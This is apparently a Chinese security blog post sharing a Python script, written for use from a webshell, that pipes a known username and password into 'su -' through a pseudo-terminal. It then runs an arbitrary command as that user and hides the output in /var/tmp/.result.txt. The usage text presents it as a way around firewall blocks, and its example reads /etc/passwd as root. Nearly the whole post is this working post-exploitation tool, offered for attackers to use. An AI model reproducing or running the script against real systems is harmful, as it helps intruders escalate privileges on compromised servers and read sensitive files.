一个知道帐户名密码在Webshell下执行命令的脚本

  • 发表于
  • Vulndb

作者:xi4oyu

新站开张,放出来吧。以前是应包总之约写的。前后也没给 过几个人,算是个伪私有版。

#!/usr/bin/env python
#For God sake, Keep it priv4t3

import sys,os,time,pty
def usage():
print "ptyexec.py: fuck the firewall block up"
print "By xi4oyu http://www.pentestday.com"
print "Usage: ptyexec.py <username> <passwd> <command>"
print 'Ext: ptyexec.py root 123456 "cat /etc/passwd"'
print 'Result will be located in /var/tmp'
sys.exit(0)

def fuck_child(pipein):
os.dup2(pipein,0)
fd = open("/var/tmp/.result.txt","a")
os.dup2(fd.fileno(),1)
os.dup2(fd.fileno(),2)
pty.spawn("/bin/sh")

print "GAGA..I'm back,Alt it never be happened"
sys.exit(0)

def fuck_it_up(user,passwd,command):
pipein,pipeout = os.pipe()
#Fork the fucking child
if os.fork() == 0:
fuck_child(pipein)
else:
time.sleep(2)
os.write(pipeout,'su - %s\n'% user)
time.sleep(2)
os.write(pipeout,'%s\n' % passwd)
time.sleep(2)
os.write(pipeout,'%s\n' % command)
time.sleep(2)
os.write(pipeout,'exit\n');
time.sleep(2)
sys.exit(0)

if __name__ == "__main__":
if len(sys.argv) != 4:
usage()
fuck_it_up(sys.argv[1],sys.argv[2],sys.argv[3])